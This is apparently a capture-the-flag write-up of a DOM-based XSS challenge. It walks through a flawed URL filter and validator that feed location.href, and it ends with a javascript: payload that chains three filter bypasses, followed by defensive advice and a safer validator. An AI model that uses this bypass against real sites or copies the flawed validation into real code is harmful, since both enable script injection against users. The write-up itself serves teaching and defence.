Overview
A classic DOM-based XSS challenge involving poor URL validation logic and parameter filtering. This write-up walks through the vulnerable JavaScript code and how to exploit it.
Step-by-Step Analysis
Step 1: Parameter Parsing Function (Lines 84–91)
JavaScript:
var p = function () {
  const s = new URLSearchParams(location.search);
  const p = {}; // inner `p` shadows the function name
  s.forEach((v, k) => {
    // keep a parameter only if its value contains "https:" anywhere
    v.indexOf("https:") > -1 ? (p[k] = v) : void 0;
  });
  return p;
};

- Parses query parameters from the URL
- Keeps only parameters whose value contains the substring `"https:"` anywhere (an `indexOf` check, not a scheme check)
- Returns the filtered object of parameters
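As a quick sanity check, here is a minimal console sketch of that filter (the query string is illustrative, not from the challenge):

JavaScript:
// Hypothetical demo of the same substring filter, runnable in a browser console
const qs = new URLSearchParams("l=javascript:alert(1)//https:x&x=http://y");
const kept = {};
qs.forEach((v, k) => {
  if (v.indexOf("https:") > -1) kept[k] = v; // same test as the challenge code
});
console.log(kept); // { l: "javascript:alert(1)//https:x" } survives the filter
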
---
Step 2: Domain Whitelists (Lines 94–97)
JavaScript:
s = { "debug.spix0r.online": ["debug_mode"] },
c = [".spix0r-lab.online", ".spix0r.academy", ".spix0r.team"];

- `s`: Object mapping hostnames to allowed parameters
- `c`: Array of allowed domain suffixes, used as the fallback whitelist when the current hostname is not a key of `s`
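A small sketch of how that lookup plays out at runtime (the second hostname is an assumption for illustration):

JavaScript:
var s = { "debug.spix0r.online": ["debug_mode"] },
    c = [".spix0r-lab.online", ".spix0r.academy", ".spix0r.team"];

// De-minified version of the lookup the validator performs: s[hostname] ?? c
function whitelistFor(hostname) {
  var t = s[hostname];
  return t !== null && t !== undefined ? t : c;
}

console.log(whitelistFor("debug.spix0r.online")); // ["debug_mode"]
console.log(whitelistFor("app.spix0r.team"));     // hypothetical host: falls back to c
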
---
Step 3: URL Validation Function (Lines 98–106)
JavaScript:
var u = function (e) {
  var t;
  if (!e) return !1; // empty or missing value fails
  // Only values starting with http(s):// are parsed as URLs;
  // anything else (e.g. a javascript: URI) is used verbatim as the "host"
  var n = /^https?:\/\//i.test(e) ? new URL(e).host : e;
  // De-minified: (s[window.location.hostname] ?? c).some(suffix => n.endsWith(suffix))
  return (
    null !== (t = s[window.location.hostname]) && void 0 !== t ? t : c
  ).some(function (e) {
    return n.endsWith(e);
  });
};

- The key line is:
```javascript
var n = /^https?:\/\//i.test(e) ? new URL(e).host : e;
```
- If the input does NOT start with `http(s)://`, it skips proper URL parsing and is treated as a hostname string.
- This allows a bypass using the `javascript:` scheme, as shown below.
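To see the bypass concretely (a sketch; this assumes the page is served from a host not listed in `s`, so the suffix list `c` applies):

JavaScript:
// The payload does not match /^https?:\/\//, so n stays the raw string
var payload = "javascript:alert(origin);//https:.spix0r.team";
var n = /^https?:\/\//i.test(payload) ? new URL(payload).host : payload;
console.log(n); // "javascript:alert(origin);//https:.spix0r.team"
// The suffix check passes because the raw string ends with ".spix0r.team"
console.log(n.endsWith(".spix0r.team")); // true, so u(payload) returns true

---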
Step 4: Execution Point (Line 107)
JavaScript:
// Redirect to the filtered "l" parameter if it passes validation
u(p().l) ? (location.href = p().l) : false;

- Extracts the `l` parameter from the parsed object
- Validates it using function `u()`
- If valid, redirects the user to the given URL
- Otherwise, nothing happens
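Assigning a `javascript:` URI to `location.href` is a classic DOM XSS sink: the browser executes the script in the context of the current page. A minimal demo of the sink in isolation (run it only on a throwaway page):

JavaScript:
// A javascript: URI assigned to location.href executes in the page's origin
location.href = "javascript:alert(origin)";
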
Exploitation Walkthrough
- Step 1: Bypass Parameter Filter — Use a value that contains `"https:"`
- Step 2: Bypass URL Validation — Use a `javascript:` URI scheme
- Step 3: Bypass Domain Check — Append a whitelisted domain suffix after a JavaScript comment
Final Payload:
Code:
/?l=javascript:alert(origin);//https:.spix0r.team

- `javascript:alert(origin);` — the malicious code
- `//` — a JavaScript comment; everything after it is ignored at execution time
- `https:.spix0r.team` — satisfies the `"https:"` substring check and ends with `.spix0r.team`

Learnings
- Never trust client-side filters to sanitize URLs
- Always parse the full URL with a trusted parser (e.g. `new URL()`) and validate the scheme explicitly
- Avoid assigning untrusted data directly to redirect sinks such as `location.href`
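As an illustration of those learnings, here is a hedged sketch of a safer redirect check (the function name and allowlist constant are assumptions, not the challenge's actual fix): it always parses the input, pins the scheme to `https:`, and compares the parsed hostname rather than the raw string.

JavaScript:
// Hypothetical hardened validator: a sketch, not the challenge's fix
const ALLOWED_SUFFIXES = [".spix0r-lab.online", ".spix0r.academy", ".spix0r.team"];

function isSafeRedirect(value) {
  let url;
  try {
    // Always parse; a bare string or javascript: URI never skips parsing
    url = new URL(value, window.location.origin);
  } catch {
    return false;
  }
  if (url.protocol !== "https:") return false; // pin the scheme explicitly
  // Compare the parsed hostname, not the raw input string
  return ALLOWED_SUFFIXES.some((suffix) => url.hostname.endsWith(suffix));
}

// isSafeRedirect("javascript:alert(origin);//https:.spix0r.team") -> false
// isSafeRedirect("https://app.spix0r.team/dashboard")             -> true (hypothetical URL)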
